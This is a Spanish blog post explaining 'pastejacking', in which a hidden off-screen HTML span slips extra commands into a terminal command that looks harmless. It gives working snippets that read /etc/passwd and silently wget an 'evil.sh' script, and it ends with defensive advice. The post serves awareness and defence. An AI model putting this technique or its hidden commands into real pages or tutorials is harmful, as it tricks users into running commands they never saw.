PasteJacking – Cuando copiar-pegar es un peligro

Falaz es quién afirmará no haber copiado nunca , ningún tipo de información textual en un sitio web , ya sea una serie de líneas de comando , títulos o fragmentos de texto . Y cuidado si tenéis la constumbre de pegarlos directamente en vuestra teminal .

El truco no es nuevo , pero sigue haciendo muchas víctimas , quizás por la desinformación de ciertos usuarios . ¿ Cuantos tutoriales hay en la red , en los cuales nos invitan a copiar y pegar  una serie de comandos con el fin de instalar x programa o solucionar x problema ? Os dejo responder 😀 .

Si pegais la línea de comandos que aparece a continuación , veréis que se ejecutan múchas cosas más .

 git clone /dev/null; clear; echo -n "Hola ";whoami|tr -d '\n';echo -e '!\nCuidado con lo que copias .
Aqui tienes la primera linea del fichero /etc/passwd: ';head -n1 /etc/passwd
 git clone  https://github.com/LionSec/katoolin.git

 

Screenshot from 2016-06-11 14-00-32

Es posible gracias a este fragmento de código .

 <pre> git clone <span style="position: absolute; left: -2000px; top: -100px;">/dev/null; clear; echo -n "Hola ";whoami|tr -d '\n';echo -e '!\nCuidado con lo que copias . <br> Aqui tienes la primera linea del fichero /etc/passwd: ';head -n1 /etc/passwd <br> git clone </span> https://github.com/LionSec/katoolin.git</pre>

Como véis , la parte más importante es el span , que no aparece en pantalla porque fue desplazado de 2000 pixeles a la izquierda . Pero como ha sido insertado entre el principio y el final , al selecionar el comando , también se incluye en el portapapeles de nuestro sistema .

Una vez pegado en la terminal , los comandos no deseados se ejecutarán de forma automática , porque si os habeis fijado , hay saltos de linea (<br>) , equivalentes a la tecla “Enter” , que permite ejecutar los comandos . Además , se añade /dev/null , para evitar el mensaje de error que se produce a ejecutar “git clone” , y descartar todo tipo de sospecha . Para hacerlo más limpio , basta con añadir “&> /dev/null” antes de poner el comando deseado , “y aqui no ha pasado nada ” 😎 .

<pre> git clone <span style="position: absolute; left: -2000px; top: -100px;">/dev/null;wget http://127.0.0.1/evil.sh &> /dev/null <br> git clone </span> https://github.com/LionSec/katoolin.git</pre>

Como véis , es tan secillo y efectivo que hasta los más expertos podrían caer en una trampa de este tipo . Es difícil de combatir porque la mayoría de las medidas de seguridad han sido desarolladas para ataques de pastejacking con javascript , pero como podéis ver en ningún momento he tenido que emplearlo . Por lo tanto , mis recomendaciones son las siguientes :

  • Mantener los ojos abiertos  .
  • Leer el texto copiado en un editor de texto antes de pegarlo en la terminal , para verificar que no hay ningún comando malicioso .

Vídeo

Hasta aqui hemos llegado . si te ha gustado el artículo , no olvides compartirlo .

Un cordial saludo .

 

3 thoughts on “PasteJacking – Cuando copiar-pegar es un peligro

  1. alan

    que pedazo de articulo, no lo habria imaginado, un saludo!

    • Gracias amigo , me alegro que ta haya gustado 🙂

  2. zanutsec

    good job lionsec

    bless u

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> 

*